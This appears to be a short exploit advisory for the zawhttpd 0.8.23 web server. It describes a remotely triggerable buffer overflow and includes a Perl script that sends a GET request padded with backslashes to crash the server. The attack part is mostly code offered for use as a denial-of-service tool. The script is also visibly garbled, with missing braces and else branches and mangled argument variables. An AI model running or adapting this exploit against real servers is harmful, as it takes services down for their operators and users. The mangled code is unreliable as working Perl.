Version: 0.8.23 previous version probably too.
Problem: Buffer Overflow
Discovered by: Kamil 'K3' Sienicki
zawhttpd is a mini Web server that features HTTP/1.0 and 1.1 support,
keep-alive persistent connections, IPv6 support, GET and HEAD requests,
chunked encoding and content-range, directory listing, basic
access logging, daemon mode, and more.
A remote user can supply a specially crafted data which crash server.
# zawhttpd Buffer Overflow Exploit
# by Kamil 'K3' Sienicki
my($socket) = "";
if($socket = IO::Socket::INET->new(
PeerAddr => $ARGV,
PeerPort => $ARGV,
Proto => "TCP"))
print "Attempting to kill zawhttpd at $ARGV:$ARGV ...";
print $socket "GET \\\\\\\\\\\\\\\\\\\\ HTTP/1.0\r\n\r\n";
print "perl zawhttpd.pl localhost 80 \n";
print "Cannot connect to $ARGV:$ARGV\n";
Kamil 'K3' Sienicki